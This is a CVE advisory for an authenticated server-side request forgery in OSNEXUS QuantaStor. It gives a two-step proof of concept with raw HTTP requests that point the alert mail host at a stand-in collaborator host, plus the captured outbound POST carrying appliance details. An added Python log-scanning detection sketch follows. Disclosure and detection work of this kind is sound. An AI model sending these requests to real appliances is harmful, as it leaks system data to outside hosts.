SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355
CVE-2021-42079

6.2 MEDIUM

Key Information:

Vendor

Osnexus

CVE Published:
10 July 2023

What is CVE-2021-42079?

An authenticated administrator can configure an alert that, when raised, makes the appliance perform a server-side request forgery (SSRF). The SSRF is limited to POST requests.

POC

Step 1: Prepare the SSRF with a request like this:

GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http:// HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json
Content-Length: 0

Step 2: Trigger this alert with this request:

GET /qstorapi/alertRaise?title=test&message=test&severity=1 HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic <BASIC_AUTH_HASH>
Content-Type: application/json
Content-Length: 1

The POST request received by looks like this:

{
 Python FLASK stuff
 'endpoint': 'index',
 'method': 'POST',
 'cookies': ImmutableMultiDict([]),
 END Python FLASK stuff
 'data': b'{
  "attachments": [
   {
    "fallback": "[122] test / test.",
    "color": "#aa2222",
    "title": "[122] test",
    "text": "test",
    "fields": [
     {
      "title": "Alert Severity",
      "value": "CRITICAL",
      "short": false
     }, {
      "title": "Appliance",
      "value": "quantastor (https://)",
      "short": true
     }, {
      "title": "System / Driver / Kernel Ver",
      "value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic",
      "short": false
     }, {
      "title": "System Startup",
      "value": "Fri Aug  6 16-02-55 2021",
      "short": true
     }, {
      "title": "SSID",
      "value": "f4823762-1dd1-1333-47a0-6238c474a7e7",
      "short": true
     },
    ],
    "footer": "QuantaStor Call-home Alert",
    "footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ",
    "ts": 1628461774
   }
  ],
  "mrkdwn":true
 }',
 #### FLASK REQUEST STUFF #####
 'headers': {
  'Host': '',
  'User-Agent': 'curl/7.58.0',
  'Accept': '*/*',
  'Content-Type': 'application/json',
  'Content-Length': '790'
 },
 'args': ImmutableMultiDict([]),
 'form': ImmutableMultiDict([]),
 'remote_addr': '217.103.63.173',
 'path': '/payload/58',
 'whois_ip': 'TNF-AS, NL'
}

END FLASK REQUEST STUFF
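
A detection sketch for the two-step sequence above, added here as an example and not part of the original advisory or of OSNEXUS code: it scans access-log lines for an alertConfigSet call that points an alert destination at a host outside an allow-list, then reports any alertRaise that follows. The combined-log-format layout, the allow-list and the sample lines are assumptions constructed for illustration; only the endpoint and parameter names come from the requests above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Destination parameters taken from the alertConfigSet request shown above.
DEST_PARAMS = ("smtpServerIpAddress", "slackWebhookUrl", "mattermostWebhookUrl")
# Assumed layout: combined-log-format lines from a proxy in front of the appliance.
LINE_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

ALLOWED = {"mail.corp.example", "hooks.slack.com"}  # constructed allow-list
SAMPLE_LOG = [  # constructed log lines, not taken from the advisory
    '192.0.2.10 - admin [06/Aug/2021:16:10:01 +0000] "GET /qstorapi/alertConfigSet?smtpServerIpAddress=mail.corp.example&smtpServerPort=25&slackWebhookUrl=http://collab.example.net/payload/58&mattermostWebhookUrl=http:// HTTP/1.1" 200 12',
    '192.0.2.30 - ops [06/Aug/2021:16:10:05 +0000] "GET /qstorapi/alertRaise?title=test&message=test&severity=1 HTTP/1.1" 200 12',
    '192.0.2.20 - admin [06/Aug/2021:17:00:00 +0000] "GET /qstorapi/alertConfigSet?smtpServerIpAddress=mail.corp.example&slackWebhookUrl=https://hooks.slack.com/services/T0/B0/x HTTP/1.1" 200 12',
    '192.0.2.20 - admin [06/Aug/2021:17:00:09 +0000] "GET /qstorapi/alertRaise?title=disk&message=full&severity=2 HTTP/1.1" 200 12',
]


def unapproved_destinations(target, allowed_hosts):
    """Return {param: host} for alert destinations outside the allow-list."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    found = {}
    for param in DEST_PARAMS:
        for value in query.get(param, []):
            # Webhook values are URLs; the SMTP value is a bare host or IP.
            host = urlsplit(value).hostname if "://" in value else value
            host = (host or "").lower()
            if host and host not in allowed_hosts:
                found[param] = host
    return found


def find_ssrf_sequences(lines, allowed_hosts):
    """Report alertRaise calls made while an unapproved destination is configured."""
    active = None  # (configuring client, destinations); the setting is appliance-wide
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        path = urlsplit(m["target"]).path
        if path == "/qstorapi/alertConfigSet":
            bad = unapproved_destinations(m["target"], allowed_hosts)
            active = (m["client"], bad) if bad else None
        elif path == "/qstorapi/alertRaise" and active:
            hits.append((active[0], m["client"], active[1]))
    return hits
```

Because the alert destination persists once set, a genuine system alert would trigger the same outbound POST, so the unapproved alertConfigSet call is worth alerting on by itself.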

Affected Version(s)

QuantaStor Windows 0 < 6.0.0.355

CVSS V3.1

Score: 6.2
Severity: MEDIUM
Confidentiality: High
Integrity: None
Availability: High
Attack Vector: Network
Attack Complexity: Low
Privileges Required: High
User Interaction: Required
Scope: Changed

Timeline

  • Vulnerability published

  • Vulnerability Reserved

Credit

Wietse Boonstra